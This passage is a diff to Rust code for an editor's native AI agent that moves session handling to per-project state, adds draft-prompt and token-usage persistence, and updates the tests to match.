- &context_server_store, - Self::handle_context_server_store_updated, - ), - cx.subscribe( - &context_server_registry, - Self::handle_context_server_registry_event, - ), - ]; + cx.new(|cx| { + let mut subscriptions = vec![cx.subscribe( + &LanguageModelRegistry::global(cx), + Self::handle_models_updated_event, + )]; if let Some(prompt_store) = prompt_store.as_ref() { subscriptions.push(cx.subscribe(prompt_store, Self::handle_prompts_updated_event)) } - let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = - watch::channel(()); Self { sessions: HashMap::default(), thread_store, - project_context: cx.new(|_| project_context), - project_context_needs_refresh: project_context_needs_refresh_tx, - _maintain_project_context: cx.spawn(async move |this, cx| { - Self::maintain_project_context(this, project_context_needs_refresh_rx, cx).await - }), - context_server_registry, + projects: HashMap::default(), templates, models: LanguageModels::new(cx), - project, prompt_store, fs, _subscriptions: subscriptions, } - })) + }) } fn new_session( @@ -314,10 +294,10 @@ impl NativeAgent { project: Entity, cx: &mut Context, ) -> Entity { - // Create Thread - // Fetch default model from registry settings + let project_id = self.get_or_create_project_state(&project, cx); + let project_state = &self.projects[&project_id]; + let registry = LanguageModelRegistry::read_global(cx); - // Log available models for debugging let available_count = registry.available_models(cx).count(); log::debug!("Total available models: {}", available_count); @@ -327,21 +307,22 @@ impl NativeAgent { }); let thread = cx.new(|cx| { Thread::new( - project.clone(), - self.project_context.clone(), - self.context_server_registry.clone(), + project, + project_state.project_context.clone(), + project_state.context_server_registry.clone(), self.templates.clone(), default_model, cx, ) }); - self.register_session(thread, cx) + self.register_session(thread, project_id, cx) } fn register_session( &mut self, thread_handle: Entity, + project_id: EntityId, cx: &mut Context, ) -> Entity { let connection = Rc::new(NativeAgentConnection(cx.entity())); @@ -350,20 +331,28 @@ impl NativeAgent { let session_id = thread.id().clone(); let parent_session_id = thread.parent_thread_id(); let title = thread.title(); + let draft_prompt = thread.draft_prompt().map(Vec::from); + let scroll_position = thread.ui_scroll_position(); + let token_usage = thread.latest_token_usage(); let project = thread.project.clone(); let action_log = thread.action_log.clone(); let prompt_capabilities_rx = thread.prompt_capabilities_rx.clone(); let acp_thread = cx.new(|cx| { - acp_thread::AcpThread::new( + let mut acp_thread = acp_thread::AcpThread::new( parent_session_id, title, + None, connection, project.clone(), action_log.clone(), session_id.clone(), prompt_capabilities_rx, cx, - ) + ); + acp_thread.set_draft_prompt(draft_prompt); + acp_thread.set_ui_scroll_position(scroll_position); + acp_thread.update_token_usage(token_usage, cx); + acp_thread }); let registry = LanguageModelRegistry::read_global(cx); @@ -396,12 +385,13 @@ impl NativeAgent { Session { thread: thread_handle, acp_thread: acp_thread.clone(), + project_id, _subscriptions: subscriptions, - pending_save: Task::ready(()), + pending_save: Task::ready(Ok(())), }, ); - self.update_available_commands(cx); + self.update_available_commands_for_project(project_id, cx); acp_thread } @@ -410,19 +400,106 @@ impl NativeAgent { &self.models } + fn get_or_create_project_state( + &mut self, + project: &Entity, + cx: &mut Context, + ) -> EntityId { + let project_id = project.entity_id(); + if self.projects.contains_key(&project_id) { + return project_id; + } + + let project_context = cx.new(|_| ProjectContext::new(vec![], vec![])); + self.register_project_with_initial_context(project.clone(), project_context, cx); + if let Some(state) = self.projects.get_mut(&project_id) { + state.project_context_needs_refresh.send(()).ok(); + } + project_id + } + + fn register_project_with_initial_context( + &mut self, + project: Entity, + project_context: Entity, + cx: &mut Context, + ) { + let project_id = project.entity_id(); + + let context_server_store = project.read(cx).context_server_store(); + let context_server_registry = + cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); + + let subscriptions = vec![ + cx.subscribe(&project, Self::handle_project_event), + cx.subscribe( + &context_server_store, + Self::handle_context_server_store_updated, + ), + cx.subscribe( + &context_server_registry, + Self::handle_context_server_registry_event, + ), + ]; + + let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = + watch::channel(()); + + self.projects.insert( + project_id, + ProjectState { + project, + project_context, + project_context_needs_refresh: project_context_needs_refresh_tx, + _maintain_project_context: cx.spawn(async move |this, cx| { + Self::maintain_project_context( + this, + project_id, + project_context_needs_refresh_rx, + cx, + ) + .await + }), + context_server_registry, + _subscriptions: subscriptions, + }, + ); + } + + fn session_project_state(&self, session_id: &acp::SessionId) -> Option<&ProjectState> { + self.sessions + .get(session_id) + .and_then(|session| self.projects.get(&session.project_id)) + } + async fn maintain_project_context( this: WeakEntity, + project_id: EntityId, mut needs_refresh: watch::Receiver<()>, cx: &mut AsyncApp, ) -> Result<()> { while needs_refresh.changed().await.is_ok() { let project_context = this .update(cx, |this, cx| { - Self::build_project_context(&this.project, this.prompt_store.as_ref(), cx) - })? + let state = this + .projects + .get(&project_id) + .context("project state not found")?; + anyhow::Ok(Self::build_project_context( + &state.project, + this.prompt_store.as_ref(), + cx, + )) + })?? .await; this.update(cx, |this, cx| { - this.project_context = cx.new(|_| project_context); + if let Some(state) = this.projects.get(&project_id) { + state + .project_context + .update(cx, |current_project_context, _cx| { + *current_project_context = project_context; + }); + } })?; } @@ -585,12 +662,17 @@ impl NativeAgent { let Some(session) = self.sessions.get(session_id) else { return; }; + let thread = thread.downgrade(); let acp_thread = session.acp_thread.downgrade(); cx.spawn(async move |_, cx| { let title = thread.read_with(cx, |thread, _| thread.title())?; - let task = acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; - task.await + if let Some(title) = title { + let task = + acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; + task.await?; + } + anyhow::Ok(()) }) .detach_and_log_err(cx); } @@ -611,13 +693,17 @@ impl NativeAgent { fn handle_project_event( &mut self, - _project: Entity, + project: Entity, event: &project::Event, _cx: &mut Context, ) { + let project_id = project.entity_id(); + let Some(state) = self.projects.get_mut(&project_id) else { + return; + }; match event { project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } project::Event::WorktreeUpdatedEntries(_, items) => { if items.iter().any(|(path, _, _)| { @@ -625,7 +711,7 @@ impl NativeAgent { .iter() .any(|name| path.as_ref() == RelPath::unix(name).unwrap()) }) { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } } _ => {} @@ -638,13 +724,15 @@ impl NativeAgent { _event: &prompt_store::PromptsUpdatedEvent, _cx: &mut Context, ) { - self.project_context_needs_refresh.send(()).ok(); + for state in self.projects.values_mut() { + state.project_context_needs_refresh.send(()).ok(); + } } fn handle_models_updated_event( &mut self, _registry: Entity, - _event: &language_model::Event, + event: &language_model::Event, cx: &mut Context, ) { self.models.refresh_list(cx); @@ -661,37 +749,65 @@ impl NativeAgent { thread.set_model(model, cx); cx.notify(); } - thread.set_summarization_model(summarization_model.clone(), cx); + if let Some(model) = summarization_model.clone() { + if thread.summarization_model().is_none() + || matches!(event, language_model::Event::ThreadSummaryModelChanged) + { + thread.set_summarization_model(Some(model), cx); + } + } }); } } fn handle_context_server_store_updated( &mut self, - _store: Entity, + store: Entity, _event: &project::context_server_store::ServerStatusChangedEvent, cx: &mut Context, ) { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if *state.context_server_registry.read(cx).server_store() == store { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } fn handle_context_server_registry_event( &mut self, - _registry: Entity, + registry: Entity, event: &ContextServerRegistryEvent, cx: &mut Context, ) { match event { ContextServerRegistryEvent::ToolsChanged => {} ContextServerRegistryEvent::PromptsChanged => { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if state.context_server_registry == registry { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } } } - fn update_available_commands(&self, cx: &mut Context) { - let available_commands = self.build_available_commands(cx); + fn update_available_commands_for_project(&self, project_id: EntityId, cx: &mut Context) { + let available_commands = + Self::build_available_commands_for_project(self.projects.get(&project_id), cx); for session in self.sessions.values() { + if session.project_id != project_id { + continue; + } session.acp_thread.update(cx, |thread, cx| { thread .handle_session_update( @@ -705,8 +821,14 @@ impl NativeAgent { } } - fn build_available_commands(&self, cx: &App) -> Vec { - let registry = self.context_server_registry.read(cx); + fn build_available_commands_for_project( + project_state: Option<&ProjectState>, + cx: &App, + ) -> Vec { + let Some(state) = project_state else { + return vec![]; + }; + let registry = state.context_server_registry.read(cx); let mut prompt_name_counts: HashMap<&str, usize> = HashMap::default(); for context_server_prompt in registry.prompts() { @@ -760,6 +882,7 @@ impl NativeAgent { pub fn load_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { let database_future = ThreadsDatabase::connect(cx); @@ -771,46 +894,57 @@ impl NativeAgent { .with_context(|| format!("no thread found with ID: {id:?}"))?; this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + let project_state = this + .projects + .get(&project_id) + .context("project state not found")?; let summarization_model = LanguageModelRegistry::read_global(cx) .thread_summary_model() .map(|c| c.model); - cx.new(|cx| { + Ok(cx.new(|cx| { let mut thread = Thread::from_db( id.clone(), db_thread, - this.project.clone(), - this.project_context.clone(), - this.context_server_registry.clone(), + project_state.project.clone(), + project_state.project_context.clone(), + project_state.context_server_registry.clone(), this.templates.clone(), cx, ); thread.set_summarization_model(summarization_model, cx); thread - }) - }) + })) + })? }) } pub fn open_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { if let Some(session) = self.sessions.get(&id) { return Task::ready(Ok(session.acp_thread.clone())); } - let task = self.load_thread(id, cx); + let task = self.load_thread(id, project.clone(), cx); cx.spawn(async move |this, cx| { let thread = task.await?; - let acp_thread = - this.update(cx, |this, cx| this.register_session(thread.clone(), cx))?; + let acp_thread = this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + this.register_session(thread.clone(), project_id, cx) + })?; let events = thread.update(cx, |thread, cx| thread.replay(cx)); cx.update(|cx| { NativeAgentConnection::handle_thread_events(events, acp_thread.downgrade(), cx) }) .await?; + acp_thread.update(cx, |thread, cx| { + thread.snapshot_completed_plan(cx); + }); Ok(acp_thread) }) } @@ -818,9 +952,10 @@ impl NativeAgent { pub fn thread_summary( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task> { - let thread = self.open_thread(id.clone(), cx); + let thread = self.open_thread(id.clone(), project, cx); cx.spawn(async move |this, cx| { let acp_thread = thread.await?; let result = this @@ -843,15 +978,18 @@ impl NativeAgent { return; } - let database_future = ThreadsDatabase::connect(cx); - let (id, db_thread) = - thread.update(cx, |thread, cx| (thread.id().clone(), thread.to_db(cx))); + let id = thread.read(cx).id().clone(); let Some(session) = self.sessions.get_mut(&id) else { return; }; + let project_id = session.project_id; + let Some(state) = self.projects.get(&project_id) else { + return; + }; + let folder_paths = PathList::new( - &self + &state .project .read(cx) .visible_worktrees(cx) @@ -859,10 +997,16 @@ impl NativeAgent { .collect::>(), ); + let draft_prompt = session.acp_thread.read(cx).draft_prompt().map(Vec::from); + let database_future = ThreadsDatabase::connect(cx); + let db_thread = thread.update(cx, |thread, cx| { + thread.set_draft_prompt(draft_prompt); + thread.to_db(cx) + }); let thread_store = self.thread_store.clone(); session.pending_save = cx.spawn(async move |_, cx| { let Some(database) = database_future.await.map_err(|err| anyhow!(err)).log_err() else { - return; + return Ok(()); }; let db_thread = db_thread.await; database @@ -870,21 +1014,29 @@ impl NativeAgent { .await .log_err(); thread_store.update(cx, |store, cx| store.reload(cx)); + Ok(()) }); } fn send_mcp_prompt( &self, message_id: UserMessageId, - session_id: agent_client_protocol::SessionId, + session_id: acp::SessionId, prompt_name: String, server_id: ContextServerId, arguments: HashMap, original_content: Vec, cx: &mut Context, ) -> Task> { - let server_store = self.context_server_registry.read(cx).server_store().clone(); - let path_style = self.project.read(cx).path_style(cx); + let Some(state) = self.session_project_state(&session_id) else { + return Task::ready(Err(anyhow!("Project state not found for session"))); + }; + let server_store = state + .context_server_registry + .read(cx) + .server_store() + .clone(); + let path_style = state.project.read(cx).path_style(cx); cx.spawn(async move |this, cx| { let prompt = @@ -983,8 +1135,14 @@ impl NativeAgentConnection { .map(|session| session.thread.clone()) } - pub fn load_thread(&self, id: acp::SessionId, cx: &mut App) -> Task>> { - self.0.update(cx, |this, cx| this.load_thread(id, cx)) + pub fn load_thread( + &self, + id: acp::SessionId, + project: Entity, + cx: &mut App, + ) -> Task>> { + self.0 + .update(cx, |this, cx| this.load_thread(id, project, cx)) } fn run_turn( @@ -1055,12 +1213,11 @@ impl NativeAgentConnection { thread.request_tool_call_authorization(tool_call, options, cx) })??; cx.background_spawn(async move { - if let acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome { option_id, .. }, - ) = outcome_task.await + if let acp_thread::RequestPermissionOutcome::Selected(outcome) = + outcome_task.await { response - .send(option_id) + .send(outcome) .map(|_| anyhow!("authorization receiver was dropped")) .log_err(); } @@ -1077,6 +1234,9 @@ impl NativeAgentConnection { thread.update_tool_call(update, cx) })??; } + ThreadEvent::Plan(plan) => { + acp_thread.update(cx, |thread, cx| thread.update_plan(plan, cx))?; + } ThreadEvent::SubagentSpawned(session_id) => { acp_thread.update(cx, |thread, cx| { thread.subagent_spawned(session_id, cx); @@ -1242,7 +1402,13 @@ impl acp_thread::AgentModelSelector for NativeAgentModelSelector { } } +pub static ZED_AGENT_ID: LazyLock = LazyLock::new(|| AgentId::new("Zed Agent")); + impl acp_thread::AgentConnection for NativeAgentConnection { + fn agent_id(&self) -> AgentId { + ZED_AGENT_ID.clone() + } + fn telemetry_id(&self) -> SharedString { "zed".into() } @@ -1250,10 +1416,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - log::debug!("Creating new thread for project at: {cwd:?}"); + log::debug!("Creating new thread for project at: {work_dirs:?}"); Task::ready(Ok(self .0 .update(cx, |agent, cx| agent.new_session(project, cx)))) @@ -1265,24 +1431,43 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn load_session( self: Rc, - session: AgentSessionInfo, - _project: Entity, - _cwd: &Path, + session_id: acp::SessionId, + project: Entity, + _work_dirs: PathList, + _title: Option, cx: &mut App, ) -> Task>> { self.0 - .update(cx, |agent, cx| agent.open_thread(session.session_id, cx)) + .update(cx, |agent, cx| agent.open_thread(session_id, project, cx)) } fn supports_close_session(&self) -> bool { true } - fn close_session(&self, session_id: &acp::SessionId, cx: &mut App) -> Task> { - self.0.update(cx, |agent, _cx| { - agent.sessions.remove(session_id); - }); - Task::ready(Ok(())) + fn close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + self.0.update(cx, |agent, cx| { + let thread = agent.sessions.get(session_id).map(|s| s.thread.clone()); + if let Some(thread) = thread { + agent.save_thread(thread, cx); + } + + let Some(session) = agent.sessions.remove(session_id) else { + return Task::ready(Ok(())); + }; + let project_id = session.project_id; + + let has_remaining = agent.sessions.values().any(|s| s.project_id == project_id); + if !has_remaining { + agent.projects.remove(&project_id); + } + + session.pending_save + }) } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -1311,8 +1496,12 @@ impl acp_thread::AgentConnection for NativeAgentConnection { log::info!("Received prompt request for session: {}", session_id); log::debug!("Prompt blocks count: {}", params.prompt.len()); + let Some(project_state) = self.0.read(cx).session_project_state(&session_id) else { + return Task::ready(Err(anyhow::anyhow!("Session not found"))); + }; + if let Some(parsed_command) = Command::parse(¶ms.prompt) { - let registry = self.0.read(cx).context_server_registry.read(cx); + let registry = project_state.context_server_registry.read(cx); let explicit_server_id = parsed_command .explicit_server_id @@ -1348,10 +1537,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { cx, ) }); - }; + } }; - let path_style = self.0.read(cx).project.read(cx).path_style(cx); + let path_style = project_state.project.read(cx).path_style(cx); self.run_turn(session_id, cx, move |thread, cx| { let content: Vec = params @@ -1392,7 +1581,7 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn truncate( &self, - session_id: &agent_client_protocol::SessionId, + session_id: &acp::SessionId, cx: &App, ) -> Option> { self.0.read_with(cx, |agent, _cx| { @@ -1478,16 +1667,6 @@ impl NativeAgentSessionList { } } - fn to_session_info(entry: DbThreadMetadata) -> AgentSessionInfo { - AgentSessionInfo { - session_id: entry.id, - cwd: None, - title: Some(entry.title), - updated_at: Some(entry.updated_at), - meta: None, - } - } - pub fn thread_store(&self) -> &Entity { &self.thread_store } @@ -1503,7 +1682,7 @@ impl AgentSessionList for NativeAgentSessionList { .thread_store .read(cx) .entries() - .map(Self::to_session_info) + .map(|entry| AgentSessionInfo::from(&entry)) .collect(); Task::ready(Ok(AgentSessionListResponse::new(sessions))) } @@ -1607,6 +1786,7 @@ impl NativeThreadEnvironment { }; let parent_thread = parent_thread_entity.read(cx); let current_depth = parent_thread.depth(); + let parent_session_id = parent_thread.id().clone(); if current_depth >= MAX_SUBAGENT_DEPTH { return Err(anyhow!( @@ -1623,9 +1803,26 @@ impl NativeThreadEnvironment { let session_id = subagent_thread.read(cx).id().clone(); - let acp_thread = self.agent.update(cx, |agent, cx| { - agent.register_session(subagent_thread.clone(), cx) - })?; + let acp_thread = self + .agent + .update(cx, |agent, cx| -> Result> { + let project_id = agent + .sessions + .get(&parent_session_id) + .map(|s| s.project_id) + .context("parent session not found")?; + Ok(agent.register_session(subagent_thread.clone(), project_id, cx)) + })??; + + let depth = current_depth + 1; + + telemetry::event!( + "Subagent Started", + session = parent_thread_entity.read(cx).id().to_string(), + subagent_session = session_id.to_string(), + depth, + is_resumed = false, + ); self.prompt_subagent(session_id, subagent_thread, acp_thread) } @@ -1643,6 +1840,18 @@ impl NativeThreadEnvironment { anyhow::Ok((session.thread.clone(), session.acp_thread.clone())) })??; + let depth = subagent_thread.read(cx).depth(); + + if let Some(parent_thread_entity) = self.thread.upgrade() { + telemetry::event!( + "Subagent Started", + session = parent_thread_entity.read(cx).id().to_string(), + subagent_session = session_id.to_string(), + depth, + is_resumed = true, + ); + } + self.prompt_subagent(session_id, subagent_thread, acp_thread) } @@ -1747,6 +1956,10 @@ impl SubagentHandle for NativeSubagentHandle { self.session_id.clone() } + fn num_entries(&self, cx: &App) -> usize { + self.acp_thread.read(cx).entries().len() + } + fn send(&self, message: String, cx: &AsyncApp) -> Task> { let thread = self.subagent_thread.clone(); let acp_thread = self.acp_thread.clone(); @@ -1819,10 +2032,24 @@ impl SubagentHandle for NativeSubagentHandle { SubagentPromptResult::Completed => thread.read_with(cx, |thread, _cx| { thread .last_message() - .map(|m| m.to_markdown()) + .and_then(|message| { + let content = message.as_agent_message()? + .content + .iter() + .filter_map(|c| match c { + AgentMessageContent::Text(text) => Some(text.as_str()), + _ => None, + }) + .join("\n\n"); + if content.is_empty() { + None + } else { + Some( content) + } + }) .context("No response from subagent") }), - SubagentPromptResult::Cancelled => Err(anyhow!("User cancelled")), + SubagentPromptResult::Cancelled => Err(anyhow!("User canceled")), SubagentPromptResult::Error(message) => Err(anyhow!("{message}")), SubagentPromptResult::ContextWindowWarning => { thread.update(cx, |thread, cx| thread.cancel(cx)).await; @@ -1885,13 +2112,17 @@ impl TerminalHandle for AcpTerminalHandle { #[cfg(test)] mod internal_tests { + use std::path::Path; + use super::*; use acp_thread::{AgentConnection, AgentModelGroupName, AgentModelInfo, MentionUri}; use fs::FakeFs; use gpui::TestAppContext; use indoc::formatdoc; use language_model::fake_provider::{FakeLanguageModel, FakeLanguageModelProvider}; - use language_model::{LanguageModelProviderId, LanguageModelProviderName}; + use language_model::{ + LanguageModelCompletionEvent, LanguageModelProviderId, LanguageModelProviderName, + }; use serde_json::json; use settings::SettingsStore; use util::{path, rel_path::rel_path}; @@ -1909,18 +2140,32 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + + // Creating a session registers the project and triggers context building. + let connection = NativeAgentConnection(agent.clone()); + let _acp_thread = cx + .update(|cx| { + Rc::new(connection).new_session( + project.clone(), + PathList::new(&[Path::new("/")]), + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + + let thread = agent.read_with(cx, |agent, _cx| { + agent.sessions.values().next().unwrap().thread.clone() + }); + agent.read_with(cx, |agent, cx| { - assert_eq!(agent.project_context.read(cx).worktrees, vec![]) + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + assert_eq!(state.project_context.read(cx).worktrees, vec![]); + assert_eq!(thread.read(cx).project_context().read(cx).worktrees, vec![]); }); let worktree = project @@ -1929,36 +2174,44 @@ mod internal_tests { .unwrap(); cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: None, + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: None - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); // Creating `/a/.rules` updates the project context. fs.insert_file("/a/.rules", Vec::new()).await; cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); let rules_entry = worktree .read(cx) .entry_for_path(rel_path(".rules")) .unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: Some(RulesFileContext { + path_in_worktree: rel_path(".rules").into(), + text: "".into(), + project_entry_id: rules_entry.id.to_usize(), + }), + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: Some(RulesFileContext { - path_in_worktree: rel_path(".rules").into(), - text: "".into(), - project_entry_id: rules_entry.id.to_usize() - }) - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); } @@ -1969,23 +2222,19 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let connection = NativeAgentConnection( - NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(), - ); + let connection = + NativeAgentConnection(cx.update(|cx| { + NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx) + })); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2049,22 +2298,18 @@ mod internal_tests { let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create the agent and connection - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2150,21 +2395,17 @@ mod internal_tests { let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2235,6 +2476,61 @@ mod internal_tests { }); } + #[gpui::test] + async fn test_summarization_model_survives_transient_registry_clearing( + cx: &mut TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/", json!({ "a": {} })).await; + let project = Project::test(fs.clone(), [], cx).await; + + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "session should have a summarization model from the test registry" + ); + }); + + // Simulate what happens during a provider blip: + // update_active_language_model_from_settings calls set_default_model(None) + // when it can't resolve the model, clearing all fallbacks. + cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry.set_default_model(None, cx); + }); + }); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "summarization model should survive a transient default model clearing" + ); + }); + } + #[gpui::test] async fn test_loaded_thread_preserves_thinking_enabled(cx: &mut TestAppContext) { init_test(cx); @@ -2242,16 +2538,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a thinking model. @@ -2278,9 +2567,11 @@ mod internal_tests { // Create a thread and select the thinking model. let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2325,7 +2616,9 @@ mod internal_tests { // Reload the thread and verify thinking_enabled is still true. let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2348,16 +2641,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a model where id() != name(), like real Anthropic models @@ -2385,9 +2671,11 @@ mod internal_tests { // Create a thread and select the model. let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2432,7 +2720,9 @@ mod internal_tests { // Reload the thread and verify the model was preserved. let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2467,23 +2757,16 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -2523,6 +2806,13 @@ mod internal_tests { cx.run_until_parked(); model.send_last_completion_stream_text_chunk("Lorem."); + model.send_last_completion_stream_event(LanguageModelCompletionEvent::UsageUpdate( + language_model::TokenUsage { + input_tokens: 150, + output_tokens: 75, + ..Default::default() + }, + )); model.end_last_completion_stream(); cx.run_until_parked(); summary_model @@ -2552,6 +2842,24 @@ mod internal_tests { cx.run_until_parked(); + // Set a draft prompt with rich content blocks and scroll position + // AFTER run_until_parked, so the only save that captures these + // changes is the one performed by close_session itself. + let draft_blocks = vec![ + acp::ContentBlock::Text(acp::TextContent::new("Check out ")), + acp::ContentBlock::ResourceLink(acp::ResourceLink::new("b.md", uri.to_string())), + acp::ContentBlock::Text(acp::TextContent::new(" please")), + ]; + 